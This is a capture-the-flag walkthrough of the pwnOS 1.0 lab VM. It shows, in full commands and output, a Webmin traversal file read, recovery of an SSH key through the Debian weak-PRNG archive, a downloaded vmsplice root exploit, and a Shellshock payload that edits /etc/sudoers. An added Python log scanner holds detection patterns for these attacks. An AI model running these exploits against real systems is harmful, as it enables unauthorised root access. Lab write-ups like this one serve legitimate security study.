Continuing PWNOS: 1.0, Solution One
Preface
There are four users in /etc/passwd. Whoever administers this box almost certainly logs in over SSH with a password. Maybe they do not use SSH at all, but if they do, that is another path in.
Obtaining the authorized_keys file
# yunki @ yunki in ~/vulnhub/pwnos1 [16:38:27]
$ sudo perl 2017.pl 192.168.54.4 10000 /home/vmware/.ssh/authorized_keys 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.54.4 on port 10000!
FILENAME: /home/vmware/.ssh/authorized_keys
FILE CONTENT STARTED
-----------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw== vmware@ubuntuvm
-------------------------------------
The above is the public key.
Discovering sensitive files
https://github.com/carlospolop/Auto_Wordlists
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
Recovering the private key from the public key (predictable pseudo-random number generator, PRNG)
# yunki @ yunki in ~/vulnhub/pwnos1 [16:48:55]
$ searchsploit prng
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (1) | multiple/remote/32673.java
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (2) | multiple/remote/32674.cpp
LPRng (RedHat 7.0) - 'lpd' Format String | linux/remote/227.c
LPRng - use_syslog Remote Format String (Metasploit) | linux/remote/16842.rb
LPRng 3.6.22/23/24 - Remote Command Execution | linux/remote/226.c
LPRng 3.6.24-1 - Remote Command Execution | linux/remote/230.c
LPRng 3.6.x - Failure To Drop Supplementary Groups | unix/local/20923.c
LPRNG html2ps 1.0 - Remote Command Execution | unix/remote/21974.pl
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5622.txt
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5720.py
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby) | linux/remote/5632.rb
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
# yunki @ yunki in ~/vulnhub/pwnos1 [16:51:00]
$ searchsploit -m 5622
Exploit: OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH
URL: https://www.exploit-db.com/exploits/5622
Path: /usr/share/exploitdb/exploits/linux/remote/5622.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /home/yunki/vulnhub/pwnos1/5622.txt
Download the key archive referenced in 5622.txt.
# yunki @ yunki in ~/vulnhub/pwnos1 [9:34:08]
$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
# yunki @ yunki in ~/vulnhub/pwnos1 [9:34:08]
$ sudo tar vjxf 5622.tar.bz2
# yunki @ yunki in ~/vulnhub/pwnos1 [9:33:13]
$ sudo grep -lr "AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14"
rsa/2048/d8629ce6dc8f2492e1454c13f46adb26-4566.pub
# yunki @ yunki in ~/vulnhub/pwnos1 [9:34:01]
$ find . -name "d8629ce6dc8f2492e1454c13f46adb26-4566*"
./rsa/2048/d8629ce6dc8f2492e1454c13f46adb26-4566.pub
./rsa/2048/d8629ce6dc8f2492e1454c13f46adb26-4566
Obtaining the initial shell
# yunki @ yunki in ~/vulnhub/pwnos1 [9:46:18] C:127
$ sudo ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.54.4
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Tue Mar 14 04:14:22 2023 from 192.168.54.128
vmware@ubuntuvm:~$
Privilege escalation, way 1: kernel exploit
vmware@ubuntuvm:~$ uname -r
2.6.22-14-server
2.6.22 is already a very specific version. When searching for exploits the search term should be neither too specific nor too broad, otherwise you get too many or too few results. The command below returns a lot; after trying many of them without success, I settled on the vmsplice exploit.
# yunki @ yunki in ~/vulnhub/pwnos1 [9:52:07]
$ searchsploit 2.6.2 | grep "Privilege Escalation"
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation | linux/local/160.c
Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2) | linux/local/5092.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c
Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1) | linux/local/5093.c
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation | linux_x86-64/local/15024.c
Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Local Privilege Escalation | linux/local/17391.c
Linux Kernel 2.6.29 - 'ptrace_attach()' Race Condition Privilege Escalation | linux/local/8678.c
Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - 'ptrace_attach' Local Privilege Escalation | linux/local/8673.c
Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation | linux/local/6851.c
Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation | linux/local/33523.c
Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation
kali
# yunki @ yunki in ~/vulnhub/pwnos1 [9:52:15]
$ searchsploit -m 5092
Exploit: Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)
URL: https://www.exploit-db.com/exploits/5092
Path: /usr/share/exploitdb/exploits/linux/local/5092.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /home/yunki/vulnhub/pwnos1/5092.c
# yunki @ yunki in ~/vulnhub/pwnos1 [9:54:22]
$ sudo php -S 0:80
[Wed Mar 15 09:54:36 2023] PHP 7.4.15 Development Server (http://0:80) started
[Wed Mar 15 09:55:17 2023] 192.168.54.4:60816 Accepted
[Wed Mar 15 09:55:17 2023] 192.168.54.4:60816 [200]: (null) /5092.c
[Wed Mar 15 09:55:17 2023] 192.168.54.4:60816 Closing
Target
vmware@ubuntuvm:~$ wget http://192.168.54.128/5092.c
--04:23:27-- http://192.168.54.128/5092.c
=> `5092.c'
Connecting to 192.168.54.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,580 (6.4K) [text/x-c]
100%[========================================================>] 6,580 --.--K/s
04:23:27 (604.20 MB/s) - `5092.c' saved [6580/6580]
vmware@ubuntuvm:~$ gcc 5092.c -o 5092
5092.c:289:28: warning: no newline at end of file
vmware@ubuntuvm:~$ chmod +x 5092
vmware@ubuntuvm:~$ ./5092
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e12000 .. 0xb7e44000
[+] root
Privilege escalation, way 2: Shellshock
Checking for Shellshock: generally the bash version needs to be below 4.3.
vmware@ubuntuvm:~$ bash --version
GNU bash, version 3.2.25(1)-release (i486-pc-linux-gnu)
Copyright (C) 2005 Free Software Foundation, Inc.
# test command
vmware@ubuntuvm:~$ env x='() { :; }; echo "It is vulnerable"' bash -c date
It is vulnerable
Tue Mar 14 04:32:52 CDT 2023
Exploiting Shellshock
Initial setup and preparation:
vmware@ubuntuvm:~$ pwd
/home/vmware
vmware@ubuntuvm:~$ vim yunki.cgi
# write "#!/bin/bash" into yunki.cgi
vmware@ubuntuvm:~$ chmod +x yunki.cgi
vmware@ubuntuvm:~$ sudo -l
[sudo] password for vmware:
sudo: pam_authenticate: Conversation error
Shellshock exploitation:
Reading the earlier 2017.pl shows that the principle is simple: request the URL http://192.168.54.4:10000/unauthenticated/, append a number of ..%01/ segments, and finish with the file to access. To reach yunki.cgi, the URL is http://192.168.54.4:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/home/vmware/yunki.cgi.
Using curl here:
# yunki @ yunki in ~/vulnhub/pwnos1 [10:16:08] C:130
$ sudo curl http://192.168.54.4:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/home/vmware/yunki.cgi -A '() { :; }; /bin/echo "vmware ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers'
<h1>Error - Missing Content-Type Header</h1>
# Use Shellshock to give vmware the right to run any command without a password.
# '() { :; }; /bin/echo "vmware ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers'
# ; (semicolon): separates two independent shell commands so several can be placed on one line.
# () { :; };: the key part of the Shellshock trigger. The function definition is passed as the value of an environment variable, and the code after the closing brace gets executed. The colon ":" is a shell builtin that does nothing; the function body itself need not do anything, since the vulnerability has already been triggered by this point.
# /bin/echo: the echo command by its absolute path.
# "vmware ALL=(ALL) NOPASSWD: ALL": the line to be added to the sudoers file. It grants the vmware user full sudo rights and lets that user run any command without entering a password.
# >> /etc/sudoers: appends the line above to the sudoers file, provided the process doing the append has sudo/root privileges or can otherwise write to that file.
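As an added defender's check that is not part of the original writeup: the two request shapes described above (repeated ..%01/ segments under Webmin's /unauthenticated/ path, and a bash function definition carried in an HTTP header) stand out in access logs. The log lines below are constructed, and the "combined" log format with Referer and User-Agent fields is an assumption about the server's logging.

```python
import re
from urllib.parse import unquote

# Webmin traversal as used by the 2017.pl exploit: repeated "..%01/" segments.
# Match the raw (undecoded) path: %01 decodes to a control byte, which is
# exactly what the vulnerable path normaliser mishandled.
TRAVERSAL_RE = re.compile(r"(?:\.\.%01/)+", re.IGNORECASE)
# Shellshock trigger: a bash function body "() { ... };" at the head of a
# header value, followed by the command that a vulnerable bash would execute.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")
# Assumed "combined" access-log line: client, timestamp, request, status,
# size, Referer, User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def analyse_line(line):
    """Return {'ip', 'path', 'findings'} for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    raw_path = m.group("path")
    if TRAVERSAL_RE.search(raw_path):
        depth = raw_path.lower().count("..%01/")
        findings.append("webmin_traversal(depth=%d)" % depth)
    # Shellshock can arrive in any header bash sees as a CGI variable; a
    # combined log only records Referer and User-Agent, so inspect those.
    for field in ("ua", "referer"):
        if SHELLSHOCK_RE.search(unquote(m.group(field))):
            findings.append("shellshock_" + field)
    return {"ip": m.group("ip"), "path": unquote(raw_path), "findings": findings}

def scan(lines):
    """Only the lines that produced at least one finding."""
    return [r for r in map(analyse_line, lines) if r and r["findings"]]

# Constructed sample log: one benign request, then the attack shapes from this page.
SAMPLE_LOG = [
    '192.168.54.128 - - [15/Mar/2023:09:55:17 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.54.128 - - [15/Mar/2023:10:16:08 -0500] "GET /unauthenticated/..%01/..%01/..%01/home/vmware/yunki.cgi HTTP/1.1" 500 61 "-" "() { :; }; /bin/echo shellshock-test"',
    '192.168.54.128 - - [15/Mar/2023:16:38:27 -0500] "GET /unauthenticated/..%01/..%01/..%01/..%01/home/vmware/.ssh/authorized_keys HTTP/1.1" 200 400 "-" "curl/7.74.0"',
    '192.168.54.128 - - [15/Mar/2023:16:40:02 -0500] "GET /cgi-bin/status HTTP/1.1" 200 88 "() { :;}; echo probe" "curl/7.74.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["path"], ", ".join(hit["findings"]))
```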
After exploiting Shellshock:
vmware@ubuntuvm:~$ sudo -l
User vmware may run the following commands on this host:
(ALL) NOPASSWD: ALL
vmware@ubuntuvm:~$ sudo /bin/bash
root@ubuntuvm:~#